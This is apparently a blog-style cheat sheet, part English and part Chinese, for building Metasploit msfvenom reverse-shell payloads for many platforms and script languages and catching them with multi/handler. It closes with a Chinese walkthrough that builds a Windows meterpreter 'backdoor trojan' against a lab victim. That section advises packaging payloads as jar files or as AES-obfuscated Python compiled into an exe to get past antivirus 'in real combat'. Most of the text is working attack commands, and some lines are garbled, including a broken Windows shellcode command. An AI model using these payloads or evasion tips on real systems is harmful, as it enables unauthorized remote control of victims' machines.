Often one of the most useful(and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your IP address(LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ’ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Shellcode
For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
Windows Based Shellcode
Your IP Address> LPORT= -f language “language放在<>里”
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
Handlers模块
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set LHOST
set LPORT
exploit -j -z
Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
下面以一个实例说明使用方法
Metasploit之我的远程控制软件
参考文献:Metasploit渗透测试笔记(Meterpreter篇
远程控制软件–>远控后门木马程序
木马程序–>控制端(攻击者)–>服务端(攻击目标)
测试环境:
攻击者:kali-linux -->192.168.2.146
受害者:Windows07 -->192.168.2.107
以下为kali-linux-2.0系统下的生成与连接方式(使用msfvenom命令的)
参考文献一
类似文献二
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=你的端口 -f exe -o payload.exe
以上就是基本命令,解释一下,-p后面是payload名称,然后是你的ip和端口(payload参数),然后是-f 格式,由于是实验就先设置exe,然后-o payload.exe指保存为payload.exe。当然,实验的时候可以把格式设置成exe,但是实战的时候毕竟有杀毒软件,所以格式最好是jar,jar就要求对方有java环境,可以用来拿java web网站的时候使用,或者设置成python然后自行shellcode免杀,即用Python容器,然后用AES混淆Python代码,再用pyinstaller编译exe,这是目前最完美的过杀毒软件方案,就连勒索软件都不会被杀毒软件干掉,除非有特殊动作,比如修改注册表。当然,楼主还有很多要学习。
具体步骤如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 -f exe -o test.exe
–>在当前目录下生成木马程序test.exe,PS:生成payload.exe不会被杀,test.exe被秒杀
PS:之后的操作步骤是和上面的一样的↓
之后在metasploit下连接后门程序,步骤如下:
msfconsole -->开启metasploit
use exploit/multi/handler -->使用“exploit/multi/handler”这个模块连接后门程序
show options -->查看需要设置的配置信息//这里其实不需要配置任何信息的
set PAYLOAD windows/meterpreter/reverse_tcp -->使用tcp反向连接
show options -->查看需要设置的配置信息
set LHOST=192.168.2.146 -->设置我们攻击者自己的连接IP
set LPORT=44444 -->设置我们攻击浙自己的连接端口
exploit -->执行连接,等待木马执行后连接
PS:远程木马被执行后接着可以直接“shell”命令拿下shell
OK,完成了!